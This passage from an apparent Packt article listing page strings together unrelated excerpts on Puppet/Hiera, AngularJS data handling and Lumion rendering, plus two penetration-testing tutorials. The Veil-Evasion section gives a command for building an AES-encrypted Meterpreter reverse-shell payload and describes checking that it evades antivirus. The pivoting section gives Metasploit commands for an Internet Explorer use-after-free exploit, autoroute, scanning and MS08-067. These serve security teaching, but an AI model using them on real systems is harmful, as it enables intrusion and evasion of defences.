::profile::webserver::dev include ::profile::database } class role::www::live inherits role::www { include ::profile::webserver::live } Usage of class inheritance here is not mandatory, but it is useful to minimize code duplication. This model expects modules to be the only components where resources are actually defined and managed; they are supposed to be reusable (we use them without modifying them) and manage only the components they are written for. In profiles, we can manage resources and the ordering of classes; we can initialize variables and use them as values for arguments in the declared classes, and we can generally benefit from having an extra layer of abstraction: Class profile::base { include ::networking include ::users } class profile::tomcat { class { '::jdk': } class { '::tomcat': } } class profile::webserver { class { '::httpd': } class { '::php': } class { '::memcache': } } In profiles subclasses, we can manage exceptions or particular cases: class profile::webserver::dev inherits profile::webserver { Class['::php'] { loglevel => "debug" } } This model is quite flexible and has gained a lot of attention and endorsement from Puppet Labs. It's not the only approach that we can follow to organize the resources we need for our nodes in a sane way, but it's the current best practice and a good point of reference, as it formalizes the concept of role and exposes how we can organize and add layers of abstraction between our nodes and the used modules. The data and the code Hiera's crusade and possibly main reason to exist is data separation. In practical terms, this means to convert Puppet code like the following one: $dns_server = $zone ? { 'it' => '1.2.3.4', default => '8.8.8.8', } class { '::resolver': server => $dns_servers, } Into something where there's no trace of local settings like: $dns_server = hiera('dns_server') class { '::resolver': server => $dns_servers, } With Puppet 3, the preceding code can be even more simplified with just the following line: include ::resolver This expects the resolver::server key evaluated as needed in our Hiera data sources. The advantages of having data (in this case, the IP of the DNS server, whatever is the logic to elaborate it) in a separated place are clear: We can manage and modify data without changing our code Different people can work on data and code Hiera's pluggable backend system dramatically enhances how and where data can be managed, allowing seamless integration with third-party tools and data sources Code layout is simpler and more error proof The lookup hierarchy is configurable Nevertheless, there are a few little drawbacks or maybe, just the necessary side effects or needed evolutionary steps. They are as follows: What we've learned about Puppet and used to do without Hiera is obsolete We don't see, directly in our code, the values we are using We have two different places where we can look to understand what code does We need to set the variables we use in our hierarchy as top scope variables or facts, or anyway, we need to refer to them with a fixed fully qualified name We might have to refactor a lot of existing code to move our data and logic into Hiera A personal note: I've been quite a late jumper on the Hiera wagon. While developing modules with the ambition that they can be reusable, I decided I couldn't exclude users who weren't using this additional component. So, until Puppet 3 with Hiera integrated in it became mainstream, I didn't want to force the usage of Hiera in my code. Now things are different. Puppet 3's data bindings change the whole scene, Hiera is deeply integrated and is here to stay, and so, even if we can happily live without using it, I would definitively recommend its usage in most of the cases.
Read more
  • 0
  • 0
  • 2372

article-image-veil-evasion
Packt
18 Jun 2014
6 min read
Save for later

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 10855

article-image-using-client-pivot-point
Packt
17 Jun 2014
6 min read
Save for later

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website: The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated. Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot: One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing. For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window: use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit An example of the results of the preceding command is shown in the following screenshot: As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot: Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important) We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot: As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot: As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands: use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot: We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands: use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot: As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot: Summary In this article, we looked at the powerful technique of establishing a pivot point from a client. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Using Virtual Destinations (Advanced) [article] Quick Start into Selenium Tests [article]
Read more
  • 0
  • 0
  • 6420
article-image-working-live-data-and-angularjs
Packt
12 Jun 2014
14 min read
Save for later

Working with Live Data and AngularJS

Packt
12 Jun 2014
14 min read
(For more resources related to this topic, see here.) Big Data is a new field that is growing every day. HTML5 and JavaScript applications are being used to showcase these large volumes of data in many new interesting ways. Some of the latest client implementations are being accomplished with libraries such as AngularJS. This is because of its ability to efficiently handle and organize data in many forms. Making business-level decisions off of real-time data is a revolutionary concept. Humans have only been able to fathom metrics based off of large-scale systems, in real time, for the last decade at most. During this time, the technology to collect large amounts of data has grown tremendously, but the high-level applications that use this data are only just catching up. Anyone can collect large amounts of data with today's complex distributed systems. Displaying this data in different formats that allow for any level of user to digest and understand its meaning is currently the main portion of what the leading-edge technology is trying to accomplish. There are so many different formats that raw data can be displayed in. The trick is to figure out the most efficient ways to showcase patterns and trends, which allow for more accurate business-level decisions to be made. We live in a fast paced world where everyone wants something done in real time. Load times must be in milliseconds, new features are requested daily, and deadlines get shorter and shorter. The Web gives companies the ability to generate revenue off a completely new market and AngularJS is on the leading edge. This new market creates many new requirements for HTML5 applications. JavaScript applications are becoming commonplace in major companies. These companies are using JavaScript to showcase many different types of data from inward to outward facing products. Working with live data sets in client-side applications is a common practice and is the real world standard. Most of the applications today use some type of live data to accomplish some given set of tasks. These tasks rely on this data to render views that the user can visualize and interact with. There are many advantages of working with the Web for data visualization, and we are going to showcase how these tie into an AngularJS application. AngularJS offers different methods to accomplish a view that is in charge of elegantly displaying large amounts of data in very flexible and snappy formats. Some of these different methods feed directives' data that has been requested and resolved, while others allow the directive to maintain control of the requests. We will go over these different techniques of how to efficiently get live data into the view layer by creating different real-world examples. We will also go over how to properly test directives that rely on live data to achieve their view successfully. Techniques that drive directives Most standard data requirements for a modern application involve an entire view that depends on a set of data. This data should be dependent on the current state of the application. The state can be determined in different ways. A common tactic is to build URLs that replicate a snapshot of the application's state. This can be done with a combination of URL paths and parameters. URL paths and parameters are what you will commonly see change when you visit a website and start clicking around. An AngularJS application is made up of different route configurations that use the URL to determine which action to take. Each configuration will have an associated controller, template, and other forms of options. These configurations work in unison to get data into the application in the most efficient ways. AngularUI also offers its own routing system. This UI-Router is a simple system built on complex concepts, which allows nested views to be controlled by different state options. This concept yields the same result as ngRoute, which is to get data into the controller; however, UI-Router does it in a more eloquent way, which creates more options. AngularJS 2.0 will contain a hybrid router that utilizes the best of each. Once the controller gets the data, it feeds the retrieved data to the template views. The template is what holds the directives that are created to perform the view layer functionality. The controller feeds directives' data, which forces the directives to rely on the controllers to be in charge of the said data. This data can either be fed immediately after the route configurations are executed or the application can wait for the data to be resolved. AngularJS offers you the ability to make sure that data requests have been successfully accomplished before any controller logic is executed. The method is called resolving data, and it is utilized by adding the resolve functions to the route configurations. This allows you to write the business logic in the controller in a synchronous manner, without having to write callbacks, which can be counter-intuitive. The XHR extensions of AngularJS are built using promise objects. These promise objects are basically a way to ensure that data has been successfully retrieved or to verify whether an error has occurred. Since JavaScript embraces callbacks at the core, there are many points of failure with respect to timing issues of when data is ready to be worked with. This is where libraries such as the Q library come into play. The promise object allows the execution thread to resemble a more synchronous flow, which reduces complexity and increases readability. The $q library The $q factory is a lite instantiation of the formally accepted Q library (https://github.com/kriskowal/q). This lite package contains only the functions that are needed to defer JavaScript callbacks asynchronously, based on the specifications provided by the Q library. The benefits of using this object are immense, when working with live data. Basically, the $q library allows a JavaScript application to mimic synchronous behavior when dealing with asynchronous data requests or methods that are not thread blocked by nature. This means that we can now successfully write our application's logic in a way that follows a synchronous flow. ES6 (ECMAScript6) incorporates promises at its core. This will eventually alleviate the need, for many functions inside the $q library or the entire library itself, in AngularJS 2.0. The core AngularJS service that is related to CRUD operations is called $http. This service uses the $q library internally to allow the powers of promises to be used anywhere a data request is made. Here is an example of a service that uses the $q object in order to create an easy way to resolve data in a controller. Refer to the following code: this.getPhones = function() { var request = $http.get('phones.json'), promise; promise = request.then(function(response) { return response.data; },function(errorResponse){ return errorResponse; }); return promise; } Here, we can see that the phoneService function uses the $http service, which can request for all the phones. The phoneService function creates a new request object, that calls a then function that returns a promise object. This promise object is returned synchronously. Once the data is ready, the then function is called and the correct data response is returned. This service is best showcased correctly when used in conjunction with a resolve function that feeds data into a controller. The resolve function will accept the promise object being returned and will only allow the controller to be executed once all of the phones have been resolved or rejected. The rest of the code that is needed for this example is the application's configuration code. The config process is executed on the initialization of the application. This is where the resolve function is supposed to be implemented. Refer to the following code: var app = angular.module('angularjs-promise-example',['ngRoute']); app.config(function($routeProvider){ $routeProvider.when('/', { controller: 'PhoneListCtrl', templateUrl: 'phoneList.tpl.html', resolve: { phones: function(phoneService){ return phoneService.getPhones(); } } }).otherwise({ redirectTo: '/' }); }) app.controller('PhoneListCtrl', function($scope, phones) { $scope.phones = phones; }); A live example of this basic application can be found at http://plnkr.co/edit/f4ZDCyOcud5WSEe9L0GO?p=preview. Directives take over once the controller executes its initial context. This is where the $compile function goes through all of its stages and links directives to the controller's template. The controller will still be in charge of driving the data that is sitting inside the template view. This is why it is important for directives to know what to do when their data changes. How should data be watched for changes? Most directives are on a need-to-know basis about the details of how they receive the data that is in charge of their view. This is a separation of logic that reduces cyclomatic complexity in an application. The controllers should be in charge of requesting data and passing this data to directives, through their associated $scope object. Directives should be in charge of creating DOM based on what data they receive and when the data changes. There are an infinite number of possibilities that a directive can try to achieve once it receives its data. Our goal is to showcase how to watch live data for changes and how to make sure that this works at scale so that our directives have the opportunity to fulfill their specific tasks. There are three built-in ways to watch data in AngularJS. Directives use the following methods to carry out specific tasks based on the different conditions set in the source of the program: Watching an object's identity for changes Recursively watching all of the object's properties for changes Watching just the top level of an object's properties for changes Each of these methods has its own specific purpose. The first method can be used if the variable that is being watched is a primitive type. The second type of method is used for deep comparisons between objects. The third type is used to do a shallow watch on an array of any type or just on a normal object. Let's look at an example that shows the last two watcher types. This example is going to use jsPerf to showcase our logic. We are leaving the first watcher out because it only watches primitive types and we will be watching many objects for different levels of equality. This example sets the $scope variable in the app's run function because we want to make sure that the jsPerf test resets each data set upon initialization. Refer to the following code: app.run(function($rootScope) { $rootScope.data = [ {'bob': true}, {'frank': false}, {'jerry': 'hey'}, {'bargle':false}, {'bob': true}, {'bob': true}, {'frank': false}, {'jerry':'hey'},{'bargle': false},{'bob': true},{'bob': true},{'frank': false}]; }); This run function sets up our data object that we will watch for changes. This will be constant throughout every test we run and will reset back to this form at the beginning of each test. Doing a deep watch on $rootScope.data This watch function will do a deep watch on the data object. The true flag is the key to setting off a deep watch. The purpose of a deep comparison is to go through every object property and compare it for changes on every digest. This is an expensive function and should be used only when necessary. Refer to the following code: app.service('Watch', function($rootScope) { return { run: function() { $rootScope.$watch('data', function(newVal, oldVal) { },true); //the digest is here because of the jsPerf test. We are using thisrun function to mimic a real environment. $rootScope.$digest(); } }; }); Doing a shallow watch on $rootScope.data The shallow watch is called whenever a top-level object is changed in the data object. This is less expensive because the application does not have to traverse n levels of data. Refer to the following code: app.service('WatchCollection', function($rootScope) { return { run: function() { $rootScope.$watchCollection('data', function(n, o) { }); $rootScope.$digest(); } }; }); During each individual test, we get each watcher service and call its run function. This fires the watcher on initialization, and then we push another test object to the data array, which fires the watch's trigger function again. That is the end of the test. We are using jsperf.com to show the results. Note that the watchCollection function is much faster and should be used in cases where it is acceptable to shallow watch an object. The example can be found at http://jsperf.com/watchcollection-vs-watch/5. Refer to the following screenshot: This test implies that the watchCollection function is a better choice to watch an array of objects that can be shallow watched for changes. This test is also true for an array of strings, integers, or floats. This brings up more interesting points, such as the following: Does our directive depend on a deep watch of the data? Do we want to use the $watch function, even though it is slow and memory taxing? Is it possible to use the $watch function if we are using large data objects? The directives that have been used in this book have used the watch function to watch data directly, but there are other methods to update the view if our directives depend on deep watchers and very large data sets. Directives can be in charge There are some libraries that believe that elements can be in charge of when they should request data. Polymer (http://www.polymer-project.org/) is a JavaScript library that allows DOM elements to control how data is requested, in a declarative format. This is a slight shift from the processes that have been covered so far in this article, when thinking about what directives are meant for and how they should receive data. Let's come up with an actual use case that could possibly allow this type of behavior. Let's consider a page that has many widgets on it. A widget is a directive that needs a set of large data objects to render its view. To be more specific, lets say we want to show a catalog of phones. Each phone has a very large amount of data associated with it, and we want to display this data in a very clean simple way. Since watching large data sets can be very expensive, what will allow directives to always have the data they require, depending on the state of the application? One option is to not use the controller to resolve the Big Data and inject it into a directive, but rather to use the controller to request for directive configurations that tell the directive to request certain data objects. Some people would say this goes against normal conventions, but I say it's necessary when dealing with many widgets in the same view, which individually deal with large amounts of data. This method of using directives to determine when data requests should be made is only suggested if many widgets on a page depend on large data sets. To create this in a real-life example, let's take the phoneService function, which was created earlier, and add a new method to it called getPhone. Refer to the following code: this.getPhone = function(config) { return $http.get(config.url); }; Now, instead of requesting for all the details on the initial call, the original getPhones method only needs to return phone objects with a name and id value. This will allow the application to request the details on demand. To do this, we do not need to alter the getPhones method that was created earlier. We only need to alter the data that is supplied when the request is made. It should be noted that any directive that is requesting data should be tested to prove that it is requesting the correct data at the right time. Testing directives that control data Since the controller is usually in charge of how data is incorporated into the view, many directives do not have to be coupled with logic related to how that data is retrieved. Keeping things separate is always good and is encouraged, but in some cases, it is necessary that directives and XHR logic be used together. When these use cases reveal themselves in production, it is important to test them properly. The tests in the book use two very generic steps to prove business logic. These steps are as follows: Create, compile, and link DOM to the AngularJS digest cycle Test scope variables and DOM interactions for correct outputs Now, we will add one more step to the process. This step will lie in the middle of the two steps. The new step is as follows: Make sure all data communication is fired correctly AngularJS makes it very simple to allow additional resource related logic. This is because they have a built-in backend service mock, which allows many different ways to create fake endpoints that return structured data. The service is called $httpBackend.
Read more
  • 0
  • 0
  • 4310

article-image-unleashing-powers-lumion
Packt
12 Jun 2014
22 min read
Save for later

Unleashing the powers of Lumion

Packt
12 Jun 2014
22 min read
Lumion supports a direct import of SketchUp files, which means that we don't need to use any special format to have our 3D model in Lumion. But if you are working with modeling packages, such as 3ds Max, Maya, and Blender, you need to use a different approach by exporting a COLLADA or FBX file as these two are the best formats to work with Lumion. In particular situations, we may need to use our own animations. You may be aware that we can import basic animations in Lumion from 3D modeling packages such as 3ds Max. Lumion uses the flexibility of shortcuts to improve the control we have in the 3D world. Once we import a 3D model or even if we use a model from the Lumion library, we need to adjust the position, the orientation, and the scale of the 3D model. But keep in mind the importance of organizing your 3D world using layers as well. They are free and they will become very useful when we need to hide some objects to focus our attention on a specific detail or when we use the Hide layer and Show layer effect. At a certain point in our project, we will need to go back and undo a mistake or something that doesn't look as expected. Lumion offers you a very limited undo option. When working with Lumion, and in particular, when organizing our 3D world, and arranging and adjusting the 3D models, we might find the possibility of locking the 3D model's position to be useful. This helps us to avoid selecting and unintentionally moving other, already placed 3D models. From the beginning of our project with Lumion, it is very important for us to organize and categorize our 3D world. Sometimes we may not do this straightaway, and only after importing some 3D models and adding some content from the Lumion library we realize the need to organize our project in a better way. We can use layers and assign the existing 3D models to a new layer. Over the course of a project, it is very common to have certain 3D models updated, and we need to update those 3D models into our Lumion project. This can be a rather daunting task, taking into account that most of the time these updates in the 3D models happen after we have already assigned materials to the imported 3D model. Sometimes during the project, we may face a radical change in a 3D model we have already imported into the Lumion project. The worst scenario is reassigning all the materials to the new 3D model and perhaps relocating to the correct place. However, Lumion has an option to help us with this and to avoid reassigning all the materials or at least not all of them, and the 3D models will stay in exactly the same place. After importing a 3D model we created in our favorite 3D modeling package, it is likely that we want to enhance the look and the environment of the project by using additional 3D models. The lack of detail and content will definitely create a lifeless and dull image or video. Lumion will not only help you learn how to place content from the Lumion library, but also how you can discover what you need. Something indispensable for a smooth workflow in every project are the copy and paste tools. Imagine having to go to the import library to place the 3D model again and assigning a material every single time we need a 3D model. Lumion doesn't have a standard copy and paste tool that we can find in most software, but there is a way to emulate this feature. Lumion will help you copy a 3D model already present in your scene and avoid the trouble of going back to the Lumion library and placing a 3D model already present in your project. Removing or deleting a 3D model is a part of the process of any project. This can be particularly tricky when our 3D world is crowded with 3D models and there is a possibility of selecting and deleting the wrong 3D model. Nevertheless, Lumion does a great job in this area because it protects you from deleting something by mistake. All projects are different, and this typically brings in unique challenges. Sometimes, a building or the environment are really intricate, and this can cause difficulties when we are placing 3D models from the Lumion library. Lumion recognizes surfaces and will avoid intersecting them with any 3D model you want to place in your world. However, there are times when this feature may be in our way and cause difficulties when placing a 3D model. A project needs life, but placing dozens of models one by one is a massive task. Lumion helps us to populate our 3D world by providing the option to place more than one copy at a time. By means of a shortcut, we can place 10 copies of a 3D model. The world we live in is bursting with diversity and variety. Consequently, our eyes are incredible in picking up repetitions. Sometimes, even if we cannot explain why, we know something is wrong with a picture because it doesn't look natural. When we are working on a big project, such repetitions stand out almost immediately. We can use a feature in Lumion that gives us the ability to randomize the size of 3D models while placing them. With more than 2,000 models, we can say that Lumion has everything we need to use in our project. Although Lumion has predefined models, it doesn't mean that we can't modify some basic options. We can modify simple settings such as color and texture, but keep in mind that this doesn't mean we can change these settings in every single 3D model. In almost every project, we have some autonomy to place the 3D models and organize the 3D world. Nevertheless, there are times when we really need more accuracy than one can get with the mouse. Lumion's coordinate system can assist us with this task. Typically, we focus our attention on selecting separate 3D models so that we can make exact and accurate adjustments. Eventually, we will need to do some alterations and modifications to multiple 3D objects. Lumion shows you how you can do this, along with a practical application. While working with selections in Lumion, every time we make a selection and transform the 3D model, we need to choose the correct category. There are particular occasions when we need to select and manipulate 3D models that belong to different categories. Lumion can select 3D models from different categories in one go. Initially, we may find Lumion very restrictive in the way it works with the content placed in our project because we need to select the correct category every time we want to work with a 3D model. However, we can bypass these restrictions by using the option to select and move any 3D model in our world without selecting a category. As mentioned earlier, the world we live is full of diversity and randomness; however, almost on every project, there are some situations when we need to place the content in an orderly way. A quick example is when we need to place garden lamps along a path and they need to be spaced equally. This can be done in Lumion. Lumion is a unique application not only because of what we can do with an incredible quality, but also because we have features that initially may not seem beneficial at all until we work on a project where we see a practical application. One example is when we need to align the orientations of different 3D models, Lumion shows not only how to use it, but also how to apply it in a practical situation. While populating and arranging our project, there are times when a snapping tool comes in handy. We can always use the move and height tools to place the 3D model at the top or next to another 3D model, but Lumion allow us to snap multiple 3D models to the same position in an easy way. While placing content in our project, we are usually concerned about the location of the 3D model. However, later we realize that our project is too uniform, and this is easily spotted with plants, trees, flowers, and other objects. Instead of selecting an individual 3D model and manually rotating, relocating, and rescaling it to bring some variety to our project, Lumion helps us out with a fantastic feature to randomize the orientation, position, and scale of the 3D models. Even in the most perfect project, we can find variations in the terrains and in the building, it's natural that we find inclined surfaces. Rotate on model is a feature in Lumion that allows us to snap to the surface of other 3D models when we are moving a 3D model. We can use this to adjust a car on a slope or a book on a chair. While changing the 3D model's rotation, we can see that when the 3D model is getting closer to the 90 degree angle, it will snap automatically. This is fine, perhaps, in most cases, but there are times when we need to do some precise adjustments and this option can be helpful in our way. Lumion deactivates this feature temporarily. An initial tactic to sculpt and shape the terrain is to use the terrain brushes available with Lumion. Lumion is not an application like ZBrush, but it does well with the brushes provided to sculpt the terrain, and they are not difficult to master. Lumion explains how we can use them and some practical applications in real projects. We know how to use the five brushes to sculpt the terrain and the different results of each one of them. However, we are not limited to the standard values used in each brush because Lumion allows us to change two settings to help us sculpt the terrain. This control is useful when we need to add details at a small or large scale. Some projects don't require any specific terrain from us, but at the same time, we don't want to use a flat terrain. In the Terrain menu, we can find some tools that help us to quickly create mountains and modify other characteristics of our project. When we start a new project in Lumion, we can start using nine different presets. They sort of work as a shortcut to help us get the appearance we want for our project. Most of the time, we may use the Grass preset, but that doesn't mean we get stuck with the landscape presented. We know how we can sculpt the terrain, but we can do more than that in Lumion and see how we can completely change the aspect of the landscape. Although we have 20 presets to entirely change the look of the landscape, this doesn't mean that we cannot change any settings and actually paint the landscape. Lumion explores the Paint submenu and shows how we can use Lumion's textures to paint and change the landscape completely. Perhaps you don't want the trouble of sculpting the terrain using the tools offered in Lumion. Truth be told, in some situations, it is easier and more productive to model the terrain outside Lumion and import that terrain along with the building. Lumion has fantastic material that blends the terrain we imported with the landscape. Another solution to create accurate terrains is by means of a heightmap. A heightmap is a texture with stored values that can be used, in this case, by Lumion that translates this 2D information into a 3D terrain. Lumion will help you to see how you can import a heightmap and save the terrain you created in Lumion as a heightmap file. It is remarkable how little things, such as defining the Sun's direction, have the most considerable amount of impact on a project. Throughout the production process, we may need to adjust the Sun's direction to have a clear view of the project; however, in due course, we will get to a point where we will need to define the final orientation that we are going to use to produce a still image or a movie. Setting up the Sun's direction and height is one of the simplest tasks in Lumion; however, by only using the Weather menu, we can start feeling that there is a lack of control over these settings. Fear not though! Lumion offers an effect that provides assistance to control the Sun in a way that can make all the difference when producing a video. Lumion will help you comprehend not only how you can modify the settings for the Sun, but will also provide you with a practical example of how you can apply this feature in any project. A shadow can be defined as an area that is not or is only partially illuminated because an object is obstructing its source of illumination. It is true that we don't think that shadows are important and essential elements to create a good-looking scenario, but without them our project will be dull. Lumion is going to help us use the Shadow effect to tweak and correct the shadows in order to meet our requirements and the finishing look we want to accomplish. An additional aspect connected to the shadows in Lumion, and it happens in the real world too, is the influence of the sky over shadows. Taking a look at the shadows in any project, you can easily realize how a sunset or a midday scene can transform the color of the shadow. Lumion will show how to control and change the influence that skylight has on shadows. We have been working entirely with hard shadows. The Sun in our 3D world can produce these hard shadows, and they are called by this name because they have strong and well-defined edges with less transition between illumination and the shadow. Soft shadows can be produced by the Sun in certain circumstances, and the sky, likewise, can create these diffused shadows with soft edges. We can apply soft shadows to our project to enrich the final look. So far, we have been looking at how we can use the Weather menu to create an enjoyable environment for our exterior scenes. Lumion is also capable of producing beautiful interior scenes, but we need to work a little bit with the interior illumination before we can produce something that is presentable and eye-catching. For interior scenes, we can use the Global Illumination effect to improve the illumination that is either provided by the Sun or some artificial source of illumination. We can improve the interior look and illumination using Global Illumination. An element that can bring an extra touch to the final movie are the clouds. This is a component that does not always cross our mind when trying to attain a good-looking and realistic movie. Lumion provides us with a lot of freedom not only to change the appearance of the clouds, but also to animate and even create volume clouds to bring this fine-tuning to a different dimension. Fog is a natural phenomenon that can be added to our project, and it can really change a scene dramatically. With it, we can make a scene more mysterious or reproduce the haze where dust, smoke, and other dry particles obscure the clarity of the sky. With the Fog effect, we can achieve this and much more. The fact that we can add rain and snow, as easy as reading this sentence, really proves that Lumion is a powerful and versatile application. Adding rain or snow is something that we can easily achieve by adding two effects in the Photo or Movie mode. Lumion by default uses wind in any project you start. Once you add the first trees, you can see how they slowly move showing the effect of the wind. We can control the wind using the, yes you are right, the Foliage Wind effect. Another option to control the Sun is using a new feature introduced in Lumion Version 4. This option, that we 